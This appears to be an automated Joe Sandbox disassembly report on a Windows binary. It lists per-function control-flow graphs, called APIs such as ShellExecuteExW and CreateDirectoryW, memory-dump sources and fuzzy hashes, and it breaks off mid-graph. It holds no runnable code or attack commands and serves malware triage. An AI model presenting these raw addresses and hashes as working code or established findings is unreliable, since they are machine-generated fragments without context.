                                                                      control_flow_graph 724 401815-401825 725 401831-40185c call 401132 call 41017a 724->725 726 401827-40182c 724->726 731 40185e 725->731 732 40186f-40187b call 401458 725->732 727 401b6f-401b72 726->727 734 401860-40186a call 40cb68 731->734 738 401b51-401b6c ??3@YAXPAX@Z call 40cb68 732->738 739 401881-401886 732->739 740 401b6e 734->740 738->740 739->738 741 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 739->741 740->727 751 401b37-401b3a 741->751 752 4018c8-4018e7 741->752 753 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 751->753 757 401902-401906 752->757 758 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 752->758 753->740 760 401908-40190b 757->760 761 40190d-401912 757->761 758->734 763 40193a-401951 760->763 764 401934-401937 761->764 765 401914 761->765 763->758 768 401953-401976 763->768 764->763 766 401916-40191c 765->766 770 40191e-40192f call 40cb68 ??3@YAXPAX@Z 766->770 773 401991-401997 768->773 774 401978-40198c call 40cb68 ??3@YAXPAX@Z 768->774 770->734 777 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 773->777 778 401999-40199c 773->778 774->734 782 4019cb-4019ce 777->782 780 4019a5-4019b1 778->780 781 40199e-4019a0 778->781 780->782 781->766 783 4019d0-4019da call 4036f1 782->783 784 4019e7-4019ee call 403387 782->784 783->770 791 4019e0-4019e2 783->791 787 4019f3-4019f8 784->787 789 401b23-401b32 GetLastError 787->789 790 4019fe-401a01 787->790 789->751 792 401a07-401a11 ??2@YAPAXI@Z 790->792 793 401b19-401b1c 790->793 791->766 794 401a22 792->794 795 401a13-401a20 792->795 793->789 797 401a24-401a48 call 40ef4a call 40ca5c 794->797 795->797 802 401afe-401b17 call 40f707 call 40cb68 797->802 803 401a4e-401a6c GetLastError call 40133e call 4030c7 797->803 802->753 812 401aa9-401abe call 4036f1 803->812 813 401a6e-401a75 803->813 819 401ac0-401ac8 812->819 820 401aca-401ae2 call 40ca5c 812->820 815 401a79-401a89 ??3@YAXPAX@Z 813->815 817 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 815->817 818 401a8b-401a8d 815->818 817->734 818->817 819->815 826 401ae4-401af3 GetLastError 820->826 827 401af5-401afd ??3@YAXPAX@Z 820->827 826->815 827->802
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
                                                                      • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                      • Opcode Fuzzy Hash: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
                                                                      • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58
                                                                      Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1049 40236f-40238e LoadLibraryA GetProcAddress 1050 402390-40239b GetNativeSystemInfo 1049->1050 1051 40239c-40239f 1049->1051
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                      • String ID: GetNativeSystemInfo$kernel32
                                                                      • API String ID: 2103483237-3846845290
                                                                      • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                      • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                      • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                      • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368
                                                                      Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1260 403387-40339e GetFileAttributesW 1261 4033a0-4033a2 1260->1261 1262 4033a4-4033a6 1260->1262 1263 4033fd-4033ff 1261->1263 1264 4033b5-4033bc 1262->1264 1265 4033a8-4033b3 SetLastError 1262->1265 1266 4033c7-4033ca 1264->1266 1267 4033be-4033c5 call 40335a 1264->1267 1265->1263 1268 4033fa-4033fc 1266->1268 1269 4033cc-4033dd FindFirstFileW 1266->1269 1267->1263 1268->1263 1269->1267 1271 4033df-4033f8 FindClose CompareFileTime 1269->1271 1271->1267 1271->1268
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                      • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1799206407-0
                                                                      • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                      • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                      • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                      • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
                                                                      Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
                                                                      • SendMessageW.USER32(00008001,00000000,?), ref: 00401246
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: DiskFreeMessageSendSpace
                                                                      • String ID:
                                                                      • API String ID: 696007252-0
                                                                      • Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                      • Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
                                                                      • Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
                                                                      • Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D
                                                                      Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 830 404f67-404fac call 401458 * 2 memset 835 404fb8-404fbc 830->835 836 404fae-404fb1 830->836 837 404fc5-404fdf call 404a97 call 401370 835->837 838 404fbe 835->838 836->835 843 404fe1-404fe9 ??3@YAXPAX@Z 837->843 844 404ffa-405012 ShellExecuteExW 837->844 838->837 845 404fec-404ff9 ??3@YAXPAX@Z 843->845 846 405014-40501b 844->846 847 40503a-40503c 844->847 848 405028-40502b CloseHandle 846->848 849 40501d-405022 WaitForSingleObject 846->849 850 405031-405038 ??3@YAXPAX@Z 847->850 848->850 849->848 850->845
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00404F8B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                      • ShellExecuteExW.SHELL32(?), ref: 0040500A
                                                                      • WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
                                                                      • CloseHandle.KERNEL32(00406A69), ref: 0040502B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405032
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                      • String ID: $gA
                                                                      • API String ID: 2700081640-3949116232
                                                                      • Opcode ID: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
                                                                      • Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
                                                                      • Opcode Fuzzy Hash: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
                                                                      • Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58
                                                                      Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                      • CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                      • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                      • DispatchMessageW.USER32(?), ref: 00401D73
                                                                      • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                      • String ID: Static
                                                                      • API String ID: 2479445380-2272013587
                                                                      • Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                      • Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
                                                                      • Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
                                                                      • Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9
                                                                      Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 854 4036f1-403717 lstrlenW call 402771 857 403722-40372e 854->857 858 403719-40371d call 401172 854->858 860 403730-403734 857->860 861 403736-40373c 857->861 858->857 860->861 862 40373f-403741 860->862 861->862 863 403765-40376e call 401b75 862->863 866 403770-403783 GetSystemTimeAsFileTime GetFileAttributesW 863->866 867 403754-403756 863->867 870 403785-403793 call 403387 866->870 871 40379c-4037a5 call 401b75 866->871 868 403743-40374b 867->868 869 403758-40375a 867->869 868->869 876 40374d-403751 868->876 872 403760 869->872 873 403814-40381a 869->873 870->871 884 403795-403797 870->884 885 4037b6-4037b8 871->885 886 4037a7-4037b4 call 408dbf 871->886 872->863 880 403844-403857 call 408dbf ??3@YAXPAX@Z 873->880 881 40381c-403827 873->881 876->869 877 403753 876->877 877->867 897 403859-40385d 880->897 881->880 882 403829-40382d 881->882 882->880 888 40382f-403834 882->888 892 403839-403842 ??3@YAXPAX@Z 884->892 889 403808-403812 ??3@YAXPAX@Z 885->889 890 4037ba-4037d9 memcpy 885->890 886->884 888->880 894 403836-403838 888->894 889->897 895 4037db 890->895 896 4037ee-4037f2 890->896 892->897 894->892 898 4037ed 895->898 899 4037f4-403801 call 401b75 896->899 900 4037dd-4037e5 896->900 898->896 899->886 904 403803-403806 899->904 900->899 901 4037e7-4037eb 900->901 901->898 901->899 904->889 904->890
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                        • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                        • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                      • memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                      • String ID:
                                                                      • API String ID: 846840743-0
                                                                      • Opcode ID: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
                                                                      • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                      • Opcode Fuzzy Hash: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
                                                                      • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD
                                                                      Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 905 40f227-40f26f _EH_prolog call 40ef4a 908 40f271-40f274 905->908 909 40f277-40f27a 905->909 908->909 910 40f290-40f2b5 909->910 911 40f27c-40f281 909->911 914 40f2b7-40f2bd 910->914 912 40f283-40f285 911->912 913 40f289-40f28b 911->913 912->913 915 40f6f3-40f704 913->915 916 40f2c3-40f2c7 914->916 917 40f387-40f39a call 4011d1 914->917 918 40f2c9-40f2cc 916->918 919 40f2cf-40f2de 916->919 925 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 917->925 926 40f39c-40f3a6 call 40ef85 917->926 918->919 921 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 919->921 922 40f303-40f308 919->922 942 40f2fb-40f301 921->942 923 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 922->923 924 40f30a-40f314 922->924 928 40f353-40f369 923->928 924->923 924->928 939 40f3e1-40f3fa call 40ef4a call 40dc14 925->939 940 40f3d8-40f3df call 40dce7 925->940 948 40f3aa-40f3ac 926->948 936 40f36c-40f374 928->936 941 40f376-40f385 call 40ef63 936->941 936->942 958 40f3fd-40f420 call 40dc09 939->958 940->939 941->936 942->914 948->915 962 40f422-40f427 958->962 963 40f456-40f459 958->963 966 40f429-40f42b 962->966 967 40f42f-40f447 call 40f090 call 40ef85 962->967 964 40f485-40f4a9 ??2@YAPAXI@Z 963->964 965 40f45b-40f460 963->965 971 40f4b4 964->971 972 40f4ab-40f4b2 call 40f776 964->972 968 40f462-40f464 965->968 969 40f468-40f47e call 40f090 call 40ef85 965->969 966->967 984 40f449-40f44b 967->984 985 40f44f-40f451 967->985 968->969 969->964 973 40f4b6-40f4cd call 40ef4a 971->973 972->973 986 40f4db-40f500 call 40faff 973->986 987 40f4cf-40f4d8 973->987 984->985 985->915 991 40f502-40f507 986->991 992 40f543-40f546 986->992 987->986 995 40f509-40f50b 991->995 996 40f50f-40f514 991->996 993 40f54c-40f5a9 call 40f163 call 40f011 call 40e9ef 992->993 994 40f6ae-40f6b3 992->994 1012 40f5ae-40f5b3 993->1012 997 40f6b5-40f6b6 994->997 998 40f6bb-40f6df 994->998 995->996 1000 40f516-40f518 996->1000 1001 40f51c-40f534 call 40f090 call 40ef85 996->1001 997->998 998->915 998->958 1000->1001 1010 40f536-40f538 1001->1010 1011 40f53c-40f53e 1001->1011 1010->1011 1011->915 1013 40f615-40f61b 1012->1013 1014 40f5b5 1012->1014 1016 40f621-40f623 1013->1016 1017 40f61d-40f61f 1013->1017 1015 40f5b7 1014->1015 1018 40f5ba-40f5c3 call 40faac 1015->1018 1019 40f5c5-40f5c7 1016->1019 1020 40f625-40f631 1016->1020 1017->1015 1018->1019 1030 40f602-40f604 1018->1030 1022 40f5c9-40f5ca 1019->1022 1023 40f5cf-40f5d1 1019->1023 1024 40f633-40f635 1020->1024 1025 40f637-40f63d 1020->1025 1022->1023 1027 40f5d3-40f5d5 1023->1027 1028 40f5d9-40f5f1 call 40f090 call 40ef85 1023->1028 1024->1018 1025->998 1029 40f63f-40f645 1025->1029 1027->1028 1028->948 1038 40f5f7-40f5fd 1028->1038 1029->998 1032 40f606-40f608 1030->1032 1033 40f60c-40f610 1030->1033 1032->1033 1033->998 1038->948
                                                                      APIs
                                                                      • _EH_prolog.MSVCRT ref: 0040F230
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                        • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$H_prolog
                                                                      • String ID: pmA${D@
                                                                      • API String ID: 3431946709-901781089
                                                                      • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                      • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                      • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                      • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54
                                                                      Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1041 401b75-401b84 CreateDirectoryW 1042 401bb6-401bba 1041->1042 1043 401b86-401b93 GetLastError 1041->1043 1044 401ba0-401bad GetFileAttributesW 1043->1044 1045 401b95 1043->1045 1044->1042 1047 401baf-401bb1 1044->1047 1046 401b96-401b9f SetLastError 1045->1046 1047->1042 1048 401bb3-401bb4 1047->1048 1048->1046
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                      • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                      • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                      • String ID: k7@
                                                                      • API String ID: 635176117-1561861239
                                                                      • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                      • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                      • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                      • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549
                                                                      Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1052 40e9ef-40ea0a call 410a40 1055 40ea19-40ea52 call 406eb0 call 40f707 1052->1055 1056 40ea0c-40ea16 1052->1056 1061 40eb20-40eb46 call 40e79c call 40e6d7 1055->1061 1062 40ea58-40ea62 ??2@YAPAXI@Z 1055->1062 1074 40eb64-40eb7c call 40cdda call 401132 1061->1074 1075 40eb48-40eb5e call 40e2e8 1061->1075 1064 40ea71 1062->1064 1065 40ea64-40ea6f 1062->1065 1066 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1064->1066 1065->1066 1072 40eabe 1066->1072 1073 40eaae-40eabc 1066->1073 1076 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1072->1076 1073->1076 1089 40ebb4-40ebc4 1074->1089 1090 40eb7e-40eb8b ??2@YAPAXI@Z 1074->1090 1075->1074 1083 40ece0-40ecf7 1075->1083 1105 40eb01-40eb06 1076->1105 1106 40eafb-40eafd 1076->1106 1094 40ee93-40eeae call 40e27a 1083->1094 1095 40ecfd 1083->1095 1107 40ebf4-40ebfa 1089->1107 1108 40ebc6 1089->1108 1091 40eb96 1090->1091 1092 40eb8d-40eb94 call 40e7c1 1090->1092 1097 40eb98-40eba8 call 40f707 1091->1097 1092->1097 1111 40eeb0-40eeb6 1094->1111 1112 40eeb9-40eebc 1094->1112 1101 40ed00-40ed30 1095->1101 1120 40ebaa-40ebad 1097->1120 1121 40ebaf 1097->1121 1118 40ed60-40eda6 call 40cd11 * 2 1101->1118 1119 40ed32-40ed38 1101->1119 1116 40eb08-40eb0a 1105->1116 1117 40eb0e-40eb1a 1105->1117 1106->1105 1113 40ec00-40ec20 call 40cf2f 1107->1113 1114 40ecce-40ecdd call 40e977 1107->1114 1115 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1108->1115 1111->1112 1112->1115 1123 40eec2-40eee9 call 40cd11 1112->1123 1133 40ec25-40ec2d 1113->1133 1114->1083 1115->1107 1116->1117 1117->1061 1117->1062 1163 40ee10 1118->1163 1164 40eda8-40edab 1118->1164 1127 40ee00-40ee02 1119->1127 1128 40ed3e-40ed50 1119->1128 1129 40ebb1 1120->1129 1121->1129 1145 40ef01-40ef1d 1123->1145 1146 40eeeb-40eeff call 4107a2 1123->1146 1139 40ee06-40ee0b 1127->1139 1150 40ed56-40ed58 1128->1150 1151 40edda-40eddc 1128->1151 1129->1089 1137 40ec33-40ec3a 1133->1137 1138 40edca-40edcf 1133->1138 1147 40ec68-40ec6b 1137->1147 1148 40ec3c-40ec40 1137->1148 1141 40edd1-40edd3 1138->1141 1142 40edd7 1138->1142 1139->1115 1141->1142 1142->1151 1217 40ef1e call 40bb40 1145->1217 1218 40ef1e call 40c5e0 1145->1218 1219 40ef1e call 40e17a 1145->1219 1220 40ef1e call 41297c 1145->1220 1146->1145 1152 40ec71-40ec7f call 40f707 1147->1152 1153 40edf9-40edfe 1147->1153 1148->1147 1156 40ec42-40ec45 1148->1156 1150->1118 1159 40ed5a-40ed5c 1150->1159 1160 40ede4-40ede7 1151->1160 1161 40edde-40ede0 1151->1161 1180 